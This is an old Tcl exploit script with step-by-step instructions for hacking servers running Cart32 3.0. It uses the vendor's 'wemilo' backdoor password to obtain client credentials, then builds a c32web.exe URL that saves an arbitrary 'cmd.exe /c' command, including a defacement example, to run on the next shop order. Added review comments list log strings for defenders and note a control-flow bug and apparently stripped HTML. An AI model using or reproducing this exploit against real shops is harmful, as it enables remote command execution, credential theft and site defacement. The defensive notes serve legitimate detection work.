#!/usr/bin/tcl
# [r00tabega.security.labs]
# www.r00tabega.com
# code by futant
# backdoor found by cerberus information security team
# http://www.cerberus-infosec.com {/advcart32.html}
#
# NOTE(review): What this script does, going by the code below. It prompts for
# a hostname, a Cart32 client code, a client password and a command line,
# URL-encodes them into a query string for /scripts/c32web.exe, prints the
# resulting URL and writes wemilo.html. It only calls ::http::formatQuery; it
# never sends a request itself.
#
# NOTE(review): For defenders. The strings on this page that are worth searching
# for in web-server and proxy logs are requests to
# /scripts/cart32.exe/cart32clientlist and requests to /scripts/c32web.exe whose
# query carries the URL-encoded forms of PlusTabToSave=Run External Program,
# UseCMDLine=Yes and a CMDLine value starting with "cmd.exe /c". The client
# password travels in the query string, so it will also be in those logs and
# should be treated as exposed. Per the author's description the saved command
# fires on the next confirmed order, so on a suspect host review the Cart32+
# tab's "Run External Program" setting and rotate client passwords. The only
# version detail on this page is "3.0"; confirm the affected and fixed builds
# with the vendor.
#
# NOTE: This is terribly easy to exploit but it takes a few minutes
#
# Ok, here's how you do this.
# Go to www.myserver.com/scripts/cart32.exe
# If it says Cart32.exe 3.0, you are probably in luck
#
# Now, go to www.myserver.com/scripts/cart32.exe/cart32clientlist
# This is where the author put a backdoor in.
# type "wemilo" in the text field and hit the "Go" button
#
# Find the Client Code (username) that is for the site you are going
# to hack for example, www.myshophite.com's client code might be MSS
# or MYSHOP copy and paste the client code and client password into
# notepad/pico/whatever.
#
# Now run this script. It is a TCL script so therefore requires TCL.
# If you have a UNIX system, skip this part. If you are using windows
# get TCL from http://www.scriptics.com and run it like this:
# Start -> Run -> tclsh83 wemilo.tcl
#
#
# This script will ask you for the hostname you are hacking,
# the client code, and client password.
#
# Then it will ask you for the command you want to run on the remote
# server.
#
# (Hint: Sometimes IIS will give you the HTML root directory if you
# go to http://server.com/whatever.ida .idc, .ida or
# /cgi-bin/whatever.pl)
#
# Then this script will write data to an html file on your machine in
# the current directory called wemilo.html.
# Open this file in netscape or IE and click on the
# link. This will hopefully bring you to a Cart32 WWW page
# that will have tons of shit on it and a text box with your command
# in it. Scroll down to the bottom of the page and click "Save Cart32+ tab"
#
# Now the next order that comes through will run the command you selected.
# Go back to the main page of the site and add some shit to a shopping cart.
# If they accept check/money order fill in bogus crap and then confirm the order.
# your command will then be run.
#
# This DOES work unlike most supposed exploits.
#
#
# (IDK 2k)

# Only ::http::formatQuery is used from this package (URL-encoding of the
# key/value pairs); no HTTP request is made by the script.
package require http

puts "Cart32 exploit helper by futant"

# Interactive input: every value below is read verbatim from stdin and is not
# validated before it is placed in the URL.
puts "\nEnter the the hostname you wish to hack\nDo NOT include http://"
puts -nonewline "Host: "
flush stdout
set hostname [gets stdin]

puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password."
puts -nonewline "Client Code: "
flush stdout
set clientcode [gets stdin]

puts "\nEnter the clients password: (Also obtained from the URL above)"
puts -nonewline "Client Password: "
flush stdout
set clientpassword [gets stdin]

puts "\nNow type the command you want to run on the remote server: "
puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )"
puts -nonewline "cmd /c "
flush stdout
set command [gets stdin]

# Try to open the output file. On failure catch returns non-zero and fid holds
# the error message instead of a channel handle.
if {[catch {open wemilo.html w} fid]} {
    puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n"
    # Same query string as the one built again after this block.
    set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
    puts "\nYour custom exploit string is:"
    puts "http://$hostname/scripts/c32web.exe?$endstring"
    # NOTE(review): there is no exit or return here, so control falls through
    # to the code below, which prints the URL a second time and then calls
    # puts on fid, which is an error message here and not a channel. That
    # call raises a Tcl error.
}

# Build the c32web.exe query: a "Save Cart32+ Tab" action that sets the
# "Run External Program" option to the supplied command line. The client code
# and client password are sent as ordinary query parameters.
set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
puts "\nYour custom exploit string is:"
puts "http://$hostname/scripts/c32web.exe?$endstring"

# NOTE(review): the two empty brace literals below write blank lines as shown.
# The header says the file should contain a clickable link, so the HTML markup
# was presumably stripped when this page was extracted. Confirm against an
# original copy before relying on this listing.
puts $fid {}
puts $fid "Click here to hack $hostname"
puts $fid {}
close $fid
puts "\nWrote to wemilo.html :]\nExiting..."
# k-rad.